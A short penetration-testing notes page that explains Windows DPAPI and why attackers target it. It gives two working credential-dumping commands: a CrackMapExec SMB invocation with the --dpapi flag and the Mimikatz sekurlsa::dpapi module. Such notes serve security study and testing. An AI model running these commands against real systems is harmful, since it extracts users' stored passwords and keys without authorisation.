Data Protection API (DPAPI)

DPAPI (Data Protection Application Programming Interface) is a Windows operating system feature that provides data protection by encrypting sensitive data using a user's login credentials. DPAPI is used by various applications to protect sensitive information such as passwords, keys, and credentials.

If an attacker gains access to a user's login credentials, they can use DPAPI to decrypt the protected data. Therefore, DPAPI is a valuable target for attackers looking to gain access to sensitive information.

# Dumping DPAPI with CrackMapExec
## Requires Local Administrator privileges 
crackmapexec smb $ip -u $user -p $password --dpapi

# Dumping DPPAI with Mimikatz
sekurlsa::dpapi

References

PreviousCached Domain Credentials NextGroup Policy Preferences

Last updated 1 year ago